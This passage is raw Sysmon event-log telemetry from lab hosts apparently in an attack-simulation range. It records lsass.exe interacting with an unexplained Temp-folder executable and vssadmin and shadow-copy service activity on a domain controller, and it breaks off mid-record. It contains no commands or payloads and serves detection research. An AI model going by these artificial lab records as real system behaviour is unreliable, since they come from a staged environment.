23542300x8000000000000000217632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:40.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=083CB2CA6F55C10834E29D89C96BB6CF,SHA256=8FA0264127A98C507D7BD8BDC8ABA0B256E6301A32D4A4DDB1283E0F32293A0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.880{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.880{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E7-6216-4C05-000000003802}6340C:\Users\ADMINI~1\AppData\Local\Temp\cjumh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.680{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12C7163F6D0E1086BA43C45EF68B0E2F,SHA256=824419642124D25F6E5031ED2D42441FEA541287A85D9FAD4CC1C0E3580BC2F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.464{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.464{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.464{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.460{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.459{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.459{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:40.459{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:41.418{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=829CDBDEE1FF365A5463BA05A1A79DA9,SHA256=6693F5CF3A0937512C56FD38DF6F6327A26AD59DE47708C02590D7C9941DD5EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.911{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E9-6216-5405-000000003802}7116C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.911{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.911{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.911{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.911{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.911{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.911{C8EA50B7-F11C-6215-0A00-000000003802}620688C:\Windows\system32\services.exe{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\system32\vssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000290160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.885{C8EA50B7-12E9-6216-5305-000000003802}7076C:\Windows\System32\VSSVC.exe10.0.14393.4350 (rs1_release.210407-2154)Microsoft® Volume Shadow Copy ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationVSSVC.EXEC:\Windows\system32\vssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=C417EA0DC7EF39347AB3AFC6D9CE0A3C,SHA256=198E5F8976CB3643D7D0709793CD49F8565AEEAC7871389255C7560F497F99CB,IMPHASH=B933B302F069B1ED43D97EAA68CD7B05{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000290159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.880{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.880{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.880{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+1b8ad|C:\Windows\system32\lsasrv.dll+2878b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.864{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-5205-000000003802}7044c:\Windows\system32\vssadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.864{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-5205-000000003802}7044c:\Windows\system32\vssadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.811{C8EA50B7-12E9-6216-5005-000000003802}2082732C:\Windows\system32\conhost.exe{C8EA50B7-12E9-6216-5205-000000003802}7044c:\Windows\system32\vssadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.811{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.811{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.811{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 